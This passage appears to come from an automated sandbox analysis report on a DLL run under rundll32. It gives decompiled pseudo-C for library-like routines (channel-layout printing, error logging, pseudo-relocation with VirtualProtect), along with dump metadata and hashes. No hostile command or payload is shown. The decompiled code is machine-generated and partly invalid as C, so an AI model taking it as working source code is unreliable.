                                                      							__eax = __esp[6];
                                                      							 *__esp = __esp[6];
                                                      							__eax = L100089C0();
                                                      							goto L10;
                                                      						}
                                                      						if(__eax == 3) {
                                                      							__eax =  *(__edi + 8);
                                                      							__edx =  *(__edi + 0xc);
                                                      							__esp[4] = __eax;
                                                      							__ebx = __eax;
                                                      							__ecx = __eax;
                                                      							__esp[5] =  *(__edi + 0xc);
                                                      							__eax >> 1 = __eax >> 0x00000001 & 0x55555555;
                                                      							__ecx = __eax - (__eax >> 0x00000001 & 0x55555555);
                                                      							__ebx = __ecx;
                                                      							__ecx = __ecx >> 2;
                                                      							__ebx = __ebx & 0x33333333;
                                                      							__ecx = __ecx & 0x33333333;
                                                      							__ecx =  &(__ecx[__ebx]);
                                                      							__ecx = __ecx >> 4;
                                                      							__ecx =  &(__ecx[__ecx >> 4]);
                                                      							__ecx = __ecx & 0x0f0f0f0f;
                                                      							__ebx =  &(__ecx[__ecx >> 8]);
                                                      							__ecx = __esp[5];
                                                      							__eax = __ebx;
                                                      							__ecx = __ecx >> 1;
                                                      							__ecx >> 1 = __ecx >> 0x00000001 & 0x55555555;
                                                      							__ecx = __ecx - (__ecx >> 0x00000001 & 0x55555555);
                                                      							__eax = __eax >> 0x10;
                                                      							__edx = __ecx;
                                                      							__ecx = __ecx >> 2;
                                                      							__edx = __edx & 0x33333333;
                                                      							__ecx = __ecx & 0x33333333;
                                                      							__ebx =  &(__eax[__eax >> 0x10]);
                                                      							__ecx =  &(__ecx[__edx]);
                                                      							__eax =  &(__eax[__eax >> 0x10]);
                                                      							__edx = __ecx;
                                                      							__eax = __eax & 0x0000003f;
                                                      							__edx = __ecx >> 4;
                                                      							__ecx =  &(__ecx[__ecx >> 4]);
                                                      							__ecx = __ecx & 0x0f0f0f0f;
                                                      							__ecx = __ecx >> 8;
                                                      							__ecx =  &(__ecx[__ecx >> 8]);
                                                      							__ecx = __ecx >> 0x10;
                                                      							__ebx =  &(__ecx[__ecx >> 0x10]);
                                                      							__ebx =  &(__ecx[__ecx >> 0x10]) & 0x0000003f;
                                                      							__ecx =  &(__eax[ &(__ecx[__ecx >> 0x10]) & 0x0000003f]);
                                                      							__ebx = __ebp;
                                                      							__esi = __esi - __ecx;
                                                      							__ebx = __ebp - __esi;
                                                      							if(__ebp >= __esi) {
                                                      								L17:
                                                      								__esp[7] = __ebp;
                                                      								__eax = __esp[4];
                                                      								__ecx = 0;
                                                      								__edx = __esp[5];
                                                      								__ebp = __edi;
                                                      								do {
                                                      									__edi = __edx;
                                                      									__esi = __eax;
                                                      									__esi = (__edi << 0x00000020 | __eax) >> __cl;
                                                      									__edi = __edi >> __cl;
                                                      									if((__cl & 0x00000020) != 0) {
                                                      										__esi = __edi;
                                                      									}
                                                      									__esi = __esi & 0x00000001;
                                                      									if(__esi == 0) {
                                                      										goto L19;
                                                      									}
                                                      									_t31 = __ebx - 1; // 0x0
                                                      									__esi = _t31;
                                                      									if(__ebx != 0) {
                                                      										__ebx = __esi;
                                                      										goto L19;
                                                      									}
                                                      									__edi = __ebp;
                                                      									__ebp = __esp[7];
                                                      									if(__ebp != 0) {
                                                      										__esp[4] = __ecx;
                                                      										__eax = 0x100aeacf;
                                                      										__esp[1] = 0x100aeacf;
                                                      										__eax = __esp[6];
                                                      										 *__esp = __esp[6];
                                                      										__eax = L100089C0();
                                                      										__ecx = __esp[4];
                                                      										goto L38;
                                                      									}
                                                      									if(__ecx > 0x28) {
                                                      										goto L32;
                                                      									}
                                                      									goto L26;
                                                      									L19:
                                                      									__ecx =  &(__ecx[1]);
                                                      								} while (__ecx != 0x40);
                                                      								__edi = __ebp;
                                                      								__ebp = __esp[7];
                                                      								if(__ebp == 0) {
                                                      									goto L9;
                                                      								}
                                                      								goto L42;
                                                      							}
                                                      							__ebx = 0;
                                                      							if(__ebp == 0) {
                                                      								goto L36;
                                                      							}
                                                      							__eax = 0x100aeacf;
                                                      							__ebx = __ebp;
                                                      							__esp[1] = 0x100aeacf;
                                                      							__eax = __esp[6];
                                                      							_t46 = __ebp + 0x400; // 0x401
                                                      							__ecx = _t46;
                                                      							__esp[4] = _t46;
                                                      							 *__esp = __esp[6];
                                                      							__eax = L100089C0();
                                                      							__ecx = __esp[4];
                                                      							if(__ebp <= 0x3ff) {
                                                      								goto L36;
                                                      							}
                                                      							goto L32;
                                                      						}
                                                      						if(__eax == 0) {
                                                      							__eax =  *(__edi + 8);
                                                      							__ebx = __ebp;
                                                      							__edx =  *(__edi + 0xc);
                                                      							__esp[4] =  *(__edi + 8);
                                                      							__esp[5] =  *(__edi + 0xc);
                                                      							goto L17;
                                                      						}
                                                      						if(__ebp != 0) {
                                                      							goto L42;
                                                      						}
                                                      						goto L9;
                                                      						L12:
                                                      						__eax = __esp[6];
                                                      						__ecx =  &(__ecx[4]);
                                                      						__ebp = __ebp + 1;
                                                      						__esp[2] = __ecx;
                                                      						__ecx = "@%s";
                                                      						__esp[1] = "@%s";
                                                      						 *__esp = __esp[6];
                                                      						__eax = L100089C0();
                                                      						__esi =  *(__edi + 4);
                                                      					} while (__esi > __ebp);
                                                      					break;
                                                      				}
                                                      				if(__esi == 0) {
                                                      					__eax = 0;
                                                      					__esp[2] = 0;
                                                      					__eax = "%d channels";
                                                      					__esp[1] = "%d channels";
                                                      					__eax = __esp[6];
                                                      					 *__esp = __esp[6];
                                                      					L100089C0() = 0;
                                                      				} else {
                                                      					__eax = __esp[6];
                                                      					__edx = 0x100aead1;
                                                      					__esp[1] = 0x100aead1;
                                                      					 *__esp = __esp[6];
                                                      					L100089C0() = 0;
                                                      				}
                                                      				return _t75;
                                                      			}





                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_bprintf
                                                      • String ID: @%s$NONE
                                                      • API String ID: 3083893021-9228147
                                                      • Opcode ID: 79dbcbfc88ece960a6534e3f0ca092c78e639d7c6172cd214de36e0c89aebf28
                                                      • Instruction ID: 70331aafde610822ed2af80890897691dd53c5944589bad81a8dad7e52305c51
                                                      • Opcode Fuzzy Hash: 79dbcbfc88ece960a6534e3f0ca092c78e639d7c6172cd214de36e0c89aebf28
                                                      • Instruction Fuzzy Hash: 65114C71909B5A8BE720EF18C58016EF7E1FB443D4F55881EE889A7219D731EC94CBE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      • Error occurred in fstat(): %s, xrefs: 1001950B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _close_errnomv_logmv_strerrormv_strlcpy
                                                      • String ID: Error occurred in fstat(): %s
                                                      • API String ID: 1199337903-68092211
                                                      • Opcode ID: fe60c93a3a69f3fb052d7518d5be4b5d53371f27e76a69ea24f993d483ec9b6c
                                                      • Instruction ID: 16cc7446d487878674d3b6b426b97f2481dfa04c85c7ba054179e642ea7d2528
                                                      • Opcode Fuzzy Hash: fe60c93a3a69f3fb052d7518d5be4b5d53371f27e76a69ea24f993d483ec9b6c
                                                      • Instruction Fuzzy Hash: D5F092B48097159FC310EF14C48425AFBE4FF84700F41C82EE5D99B361DBB4A9859B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: abortmv_log
                                                      • String ID: Assertion %s failed at %s:%d$libavutil/mem.c$val || !min_size
                                                      • API String ID: 2075109169-2043513658
                                                      • Opcode ID: 8f81f5fb1eb81c7ff482c4753d8fd96b33f37a0bbede6ecb2a8b2548e6ea380c
                                                      • Instruction ID: 92dcbfe9e1960efb2ab07aa63a33d773c6a90460a03fc24632acdcdda2ae59c7
                                                      • Opcode Fuzzy Hash: 8f81f5fb1eb81c7ff482c4753d8fd96b33f37a0bbede6ecb2a8b2548e6ea380c
                                                      • Instruction Fuzzy Hash: 3CE092B8A093449FC344DF299141A0ABBE0EB88B00F51C82EF98CC7349E738D844AB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 16%
                                                      			E1008E410(signed int __eax) {
                                                      				void* _v16;
                                                      				char _v32;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				void* _v57;
                                                      				signed char _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _t57;
                                                      				void* _t63;
                                                      				int _t69;
                                                      				signed int _t71;
                                                      				signed int _t72;
                                                      				signed int _t74;
                                                      				signed int _t79;
                                                      				signed int _t84;
                                                      				signed int _t91;
                                                      				struct _CRITICAL_SECTION* _t93;
                                                      				signed int _t95;
                                                      				intOrPtr* _t96;
                                                      				signed int _t99;
                                                      				signed int _t100;
                                                      				signed int _t101;
                                                      				signed int _t103;
                                                      				signed int _t106;
                                                      				signed int _t108;
                                                      				struct _CRITICAL_SECTION _t109;
                                                      				signed int _t111;
                                                      				signed char _t113;
                                                      				signed int _t115;
                                                      				signed int _t116;
                                                      				void* _t117;
                                                      				void* _t122;
                                                      				void* _t123;
                                                      				char** _t124;
                                                      				signed int* _t127;
                                                      				signed int* _t128;
                                                      
                                                      				_t57 = __eax;
                                                      				_t123 = _t122 - 0x4c;
                                                      				_t108 =  *0x101d66e0;
                                                      				if(_t108 == 0) {
                                                      					 *0x101d66e0 = 1;
                                                      					_t63 = L1008ED80(0x1b + (L1008EB20() + _t58 * 4) * 4 >> 4 << 4);
                                                      					 *0x101d66e4 = 0;
                                                      					_t124 = _t123 - _t63;
                                                      					 *0x101d66e8 =  &_v57 & 0xfffffff0;
                                                      					_t57 = 0;
                                                      					__eflags = 0x100c637c - 7;
                                                      					if(0x100c637c <= 7) {
                                                      						goto L1;
                                                      					} else {
                                                      						_t103 =  *0x100c637c; // 0x0
                                                      						__eflags = 0x100c637c - 0xb;
                                                      						if(0x100c637c > 0xb) {
                                                      							L16:
                                                      							__eflags = _t103;
                                                      							if(_t103 != 0) {
                                                      								_t93 = 0x100c637c;
                                                      								goto L43;
                                                      							} else {
                                                      								_t71 =  *0x100c6380; // 0x0
                                                      								_t93 = 0x100c6388;
                                                      								__eflags = _t71 |  *0x100c6384;
                                                      								if((_t71 |  *0x100c6384) == 0) {
                                                      									goto L5;
                                                      								} else {
                                                      									_t93 = 0x100c637c;
                                                      									goto L7;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t93 = 0x100c637c;
                                                      							L5:
                                                      							_t57 =  *_t93;
                                                      							__eflags = _t57;
                                                      							if(_t57 != 0) {
                                                      								L43:
                                                      								__eflags = _t93 - 0x100c637c;
                                                      								if(_t93 >= 0x100c637c) {
                                                      									goto L1;
                                                      								} else {
                                                      									_v48 = _t108;
                                                      									do {
                                                      										_t49 = _t93 + 4; // 0x0
                                                      										_t114 =  *_t49;
                                                      										_t109 =  *_t93;
                                                      										_t93 = _t93 + 8;
                                                      										_t50 = _t114 + 0x10000000; // 0x905a4d
                                                      										_t51 = _t114 + 0x10000000; // 0x10000000
                                                      										_t57 = E1008E2B0(_t51);
                                                      										 *((intOrPtr*)( *_t49 + 0x10000000)) = _t109 +  *_t50;
                                                      										__eflags = _t93 - 0x100c637c;
                                                      									} while (_t93 < 0x100c637c);
                                                      									_t111 = _v48;
                                                      									goto L29;
                                                      								}
                                                      							} else {
                                                      								_t7 = _t93 + 4; // 0x0
                                                      								_t57 =  *_t7;
                                                      								L7:
                                                      								__eflags = _t57;
                                                      								if(_t57 != 0) {
                                                      									goto L43;
                                                      								} else {
                                                      									_t8 = _t93 + 8; // 0x0
                                                      									_t57 =  *_t8;
                                                      									__eflags = _t57 - 1;
                                                      									if(__eflags != 0) {
                                                      										_v88 = _t57;
                                                      										 *_t124 = "  Unknown pseudo relocation protocol version %d.\n";
                                                      										_t72 = E1008E250(__eflags);
                                                      										_push(_t108);
                                                      										_push(_t113);
                                                      										_t127 = _t124 - 0x1c;
                                                      										 *_t127 = 0x101d66f4;
                                                      										EnterCriticalSection(_t93);
                                                      										_t95 =  *0x101d66ec;
                                                      										_t128 = _t127 - 4;
                                                      										__eflags = _t95;
                                                      										while(_t95 != 0) {
                                                      											 *_t128 =  *_t95;
                                                      											_t74 = TlsGetValue(??);
                                                      											_t128 = _t128 - 4;
                                                      											_t116 = _t74;
                                                      											_t72 = GetLastError();
                                                      											__eflags = _t72;
                                                      											if(_t72 == 0) {
                                                      												__eflags = _t116;
                                                      												if(_t116 != 0) {
                                                      													 *_t128 = _t116;
                                                      													_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 4))))();
                                                      												}
                                                      											}
                                                      											_t95 =  *(_t95 + 8);
                                                      											__eflags = _t95;
                                                      										}
                                                      										 *_t128 = 0x101d66f4;
                                                      										LeaveCriticalSection(??);
                                                      										return _t72;
                                                      									} else {
                                                      										_t96 = _t93 + 0xc;
                                                      										__eflags = _t96 - 0x100c637c;
                                                      										if(_t96 >= 0x100c637c) {
                                                      											goto L1;
                                                      										} else {
                                                      											_v56 = _t108;
                                                      											do {
                                                      												_t10 = _t96 + 4; // 0x2e322e32
                                                      												_t108 =  *_t10;
                                                      												_t11 = _t96 + 8; // 0x30
                                                      												_t99 =  *_t11;
                                                      												_t12 = _t108 + 0x10000000; // 0x3e322e32
                                                      												_t103 = _t99 & 0x000000ff;
                                                      												_v52 = _t12;
                                                      												_t14 =  *_t96 + 0x10000000; // 0x4e322e32
                                                      												_t117 = _t14;
                                                      												_v48 =  *((intOrPtr*)( *_t96 + 0x10000000));
                                                      												__eflags = _t99 - 0x10;
                                                      												if(_t99 == 0x10) {
                                                      													L21:
                                                      													_t26 = _t108 + 0x10000000; // 0x905a4d
                                                      													_t79 =  *_t26 & 0x0000ffff;
                                                      													_t100 = _t99 & 0x000000e0;
                                                      													__eflags = _t79;
                                                      													if(_t79 < 0) {
                                                      														_t79 = _t79 | 0xffff0000;
                                                      														__eflags = _t79;
                                                      													}
                                                      													_t113 = _v48 + _t79 - _t117;
                                                      													__eflags = _t100;
                                                      													if(_t100 != 0) {
                                                      														L26:
                                                      														_t57 = E1008E2B0(_v52);
                                                      														 *(_t108 + 0x10000000) = _t113;
                                                      														goto L27;
                                                      													} else {
                                                      														__eflags = _t113 - 0xffff8000;
                                                      														if(__eflags < 0) {
                                                      															goto L15;
                                                      														} else {
                                                      															__eflags = _t113 - 0xffff;
                                                      															if(__eflags > 0) {
                                                      																goto L15;
                                                      															} else {
                                                      																goto L26;
                                                      															}
                                                      														}
                                                      													}
                                                      												} else {
                                                      													__eflags = _t103 - 0x20;
                                                      													if(_t103 != 0x20) {
                                                      														__eflags = _t103 - 8;
                                                      														if(__eflags == 0) {
                                                      															_t84 =  *(_t108 + 0x10000000) & 0x000000ff;
                                                      															_t101 = _t99 & 0x000000e0;
                                                      															__eflags = _t84;
                                                      															if(_t84 < 0) {
                                                      																_t84 = _t84 | 0xffffff00;
                                                      																__eflags = _t84;
                                                      															}
                                                      															_t113 = _v48 + _t84 - _t117;
                                                      															__eflags = _t101;
                                                      															if(_t101 != 0) {
                                                      																L40:
                                                      																E1008E2B0(_v52);
                                                      																_t57 = _t113;
                                                      																 *(_t108 + 0x10000000) = _t57;
                                                      																goto L27;
                                                      															} else {
                                                      																__eflags = _t113 - 0xff;
                                                      																if(__eflags > 0) {
                                                      																	goto L15;
                                                      																} else {
                                                      																	__eflags = _t113 - 0xffffff80;
                                                      																	if(__eflags < 0) {
                                                      																		goto L15;
                                                      																	} else {
                                                      																		goto L40;
                                                      																	}
                                                      																}
                                                      															}
                                                      														} else {
                                                      															_v88 = _t103;
                                                      															 *_t124 = "  Unknown pseudo relocation bit size %d.\n";
                                                      															E1008E250(__eflags);
                                                      															goto L21;
                                                      														}
                                                      													} else {
                                                      														_t18 = _t108 + 0x10000000; // 0x905a4d
                                                      														_t91 = _v48 - _t117 +  *_t18;
                                                      														__eflags = _t99 & 0x000000e0;
                                                      														_t113 = _t91;
                                                      														if((_t99 & 0x000000e0) != 0) {
                                                      															L41:
                                                      															_t57 = E1008E2B0(_v52);
                                                      															 *(_t108 + 0x10000000) = _t113;
                                                      															goto L27;
                                                      														} else {
                                                      															__eflags = _t91;
                                                      															if(__eflags < 0) {
                                                      																goto L41;
                                                      															} else {
                                                      																L15:
                                                      																_v76 = _t113;
                                                      																_v80 = _v48;
                                                      																_v88 = _t103;
                                                      																_v84 = _v52;
                                                      																 *_t124 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.\n";
                                                      																_t57 = E1008E250(__eflags);
                                                      																goto L16;
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      												goto L54;
                                                      												L27:
                                                      												_t96 = _t96 + 0xc;
                                                      												__eflags = _t96 - 0x100c637c;
                                                      											} while (_t96 < 0x100c637c);
                                                      											_t111 = _v56;
                                                      											L29:
                                                      											__eflags =  *0x101d66e4;
                                                      											if( *0x101d66e4 <= 0) {
                                                      												goto L1;
                                                      											} else {
                                                      												_t115 =  &_v32;
                                                      												do {
                                                      													_t69 =  *0x101d66e8 + (_t111 + _t111 * 4) * 4;
                                                      													_t106 =  *_t69;
                                                      													__eflags = _t106;
                                                      													if(_t106 != 0) {
                                                      														_v80 = _t115;
                                                      														_v84 = _t106;
                                                      														_v88 =  *(_t69 + 8);
                                                      														 *_t124 =  *(_t69 + 4);
                                                      														_t69 = VirtualProtect(??, ??, ??, ??);
                                                      														_t124 = _t124 - 0x10;
                                                      													}
                                                      													_t111 = _t111 + 1;
                                                      													__eflags = _t111 -  *0x101d66e4;
                                                      												} while (_t111 <  *0x101d66e4);
                                                      												return _t69;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					L1:
                                                      					return _t57;
                                                      				}
                                                      				L54:
                                                      			}
                                                      0x1008e514
                                                      0x1008e50c
                                                      0x1008e4f7
                                                      0x00000000
                                                      0x1008e5d9
                                                      0x1008e5d9
                                                      0x1008e5dc
                                                      0x1008e5dc
                                                      0x1008e5e8
                                                      0x1008e5eb
                                                      0x1008e5f1
                                                      0x1008e5f3
                                                      0x00000000
                                                      0x1008e5f9
                                                      0x1008e5ff
                                                      0x1008e608
                                                      0x1008e611
                                                      0x1008e614
                                                      0x1008e616
                                                      0x1008e618
                                                      0x1008e61a
                                                      0x1008e61e
                                                      0x1008e625
                                                      0x1008e62c
                                                      0x1008e62f
                                                      0x1008e631
                                                      0x1008e631
                                                      0x1008e634
                                                      0x1008e637
                                                      0x1008e637
                                                      0x1008e646
                                                      0x1008e646
                                                      0x1008e5f3
                                                      0x1008e4b9
                                                      0x1008e4aa
                                                      0x1008e49e
                                                      0x1008e493
                                                      0x1008e484
                                                      0x1008e423
                                                      0x1008e423
                                                      0x1008e42a
                                                      0x1008e42a
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 55d33e5ae2fdebf123d5d6c44a8726b7159fae46d8a505568c5676af4475ca4e
                                                      • Instruction ID: 673c3b97693f899d3c2f50e5342af0a7e5fead6986cad9ee1b36c1617013f18f
                                                      • Opcode Fuzzy Hash: 55d33e5ae2fdebf123d5d6c44a8726b7159fae46d8a505568c5676af4475ca4e
                                                      • Instruction Fuzzy Hash: 0D917D71E006A68FCB10DF68C98074EB7F4FF88394F46896AE854A7259E734FD508B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: strlen$strchrstrncmp
                                                      • String ID: -
                                                      • API String ID: 2264528763-2547889144
                                                      • Opcode ID: 48f7d506b45c4cfb1b097bd66a56f7f6b4d5827668b9fbc93cb44df58068eac6
                                                      • Instruction ID: 2e89a320e1afa525ac89b1a85f99ca85d7156f5341a68399cbbe94f8cfb36377
                                                      • Opcode Fuzzy Hash: 48f7d506b45c4cfb1b097bd66a56f7f6b4d5827668b9fbc93cb44df58068eac6
                                                      • Instruction Fuzzy Hash: 8C318F75A083918FEB10DA78949025EBBE1FF89284F05492EE9C8D7249E278D906D792
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 23%
                                                      			E1001E48C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                      
                                                      				while(1) {
                                                      					__eax = 4[__edx];
                                                      					__edx =  &(4[__edx]);
                                                      					__eflags = __eax - 0xffffffff;
                                                      					if(__eax == 0xffffffff) {
                                                      						break;
                                                      					}
                                                      					__eflags = __eax - __ecx;
                                                      					if(__eflags != 0) {
                                                      						continue;
                                                      					}
                                                      					__esp[3] = __esi;
                                                      					__eax = 0;
                                                      					__esp[2] = 0;
                                                      					__eax = __esi[0x30];
                                                      					__esp[1] = __esi[0x30];
                                                      					__eax = __esi[0x2c];
                                                      					 *__esp = __esi[0x2c];
                                                      					__eax = E1001F6A0(__ebx, __edx, __edi, __esi, __ebp, __eflags);
                                                      					__eflags = __eax;
                                                      					__ebx = __eax;
                                                      					if(__eax < 0) {
                                                      						L2:
                                                      						return 0;
                                                      					}
                                                      					__eax = __esi[4];
                                                      					__edx =  *__eax;
                                                      					__edx =  *( *__eax + 0x34);
                                                      					__eflags = __edx;
                                                      					if(__edx == 0) {
                                                      						L9:
                                                      						__eax = __eax[8];
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							__ebp = __esi[0x1c];
                                                      							__eflags = __esi[0x1c];
                                                      							if(__esi[0x1c] == 0) {
                                                      								__esi[0x1c] = __eax;
                                                      							}
                                                      						}
                                                      						__edi = __esi[0x20];
                                                      						__eflags = __esi[0x20];
                                                      						if(__esi[0x20] <= 0) {
                                                      							L1:
                                                      							goto L2;
                                                      						} else {
                                                      							__eax = __esp[0x18];
                                                      							__ebx = 4;
                                                      							__edx = __esp[0x18][4];
                                                      							__esp[1] = 4;
                                                      							__esp[0xa] = __edx;
                                                      							__eax =  *(__edx + 0x20);
                                                      							 *__esp =  *(__edx + 0x20);
                                                      							__eax = E100266D0();
                                                      							__esp[0xf] = __eax;
                                                      							__eflags = __eax;
                                                      							if(__eax == 0) {
                                                      								__ebx = 0xfffffff4;
                                                      								L25:
                                                      								__eax = __esi[4];
                                                      								__eax =  *(__esi[4]);
                                                      								__eax = ( *(__esi[4]))[0x38];
                                                      								__eflags = __eax;
                                                      								if(__eax != 0) {
                                                      									 *__esp = __esi;
                                                      									__eax =  *__eax();
                                                      								}
                                                      								goto L2;
                                                      							}
                                                      							__edx = __esp[0xa];
                                                      							__ebx = 0;
                                                      							__ebp = 0;
                                                      							__ecx =  *(__edx + 0x20);
                                                      							__eflags =  *(__edx + 0x20);
                                                      							if( *(__edx + 0x20) <= 0) {
                                                      								L30:
                                                      								__eax =  &(__esp[0xf]);
                                                      								__ebx = 0;
                                                      								E100265C0( &(__esp[0xf]));
                                                      								goto L2;
                                                      							}
                                                      							__esp[0xb] = __esi;
                                                      							__edi = 0;
                                                      							__esi = __eax;
                                                      							__esp[0xa] = __edx;
                                                      							while(1) {
                                                      								__eax = L1001AC40(__ebx, __edi, __esi);
                                                      								__ebx = __ebp * 4;
                                                      								 *__esi = __eax;
                                                      								__eax = __esp[0xf];
                                                      								__eax = __ebx[__esp[0xf]];
                                                      								__eflags = __eax;
                                                      								if(__eax == 0) {
                                                      									break;
                                                      								}
                                                      								__esp[1] = __eax;
                                                      								__eax = __esp[0x18];
                                                      								__edx = 0;
                                                      								__esp[2] = 0;
                                                      								 *__esp = __esp[0x18];
                                                      								__eax = E1001E2F0();
                                                      								__eflags = __eax;
                                                      								__edi = __eax;
                                                      								if(__eax < 0) {
                                                      									__edx = __esp[0xa];
                                                      									__ebx = __eax;
                                                      									__esi = __esp[0xb];
                                                      									__eax =  *(__edx + 0x20);
                                                      									__eflags =  *(__edx + 0x20);
                                                      									if( *(__edx + 0x20) > 0) {
                                                      										L22:
                                                      										__edi = 0;
                                                      										__eflags = 0;
                                                      										__ebp = __edx;
                                                      										do {
                                                      											__esp[0xf] = __esp[0xf] + __edi * 4;
                                                      											__edi =  &(__edi[1]);
                                                      											__eax = L1001ADB0(__ebx, __eax);
                                                      											__eflags = __edi -  *((intOrPtr*)(__ebp + 0x20));
                                                      										} while (__edi <  *((intOrPtr*)(__ebp + 0x20)));
                                                      										__eax =  &(__esp[0xf]);
                                                      										E100265C0( &(__esp[0xf]));
                                                      										__eflags = __ebx;
                                                      										if(__ebx >= 0) {
                                                      											goto L1;
                                                      										}
                                                      										goto L25;
                                                      									}
                                                      									__eax =  &(__esp[0xf]);
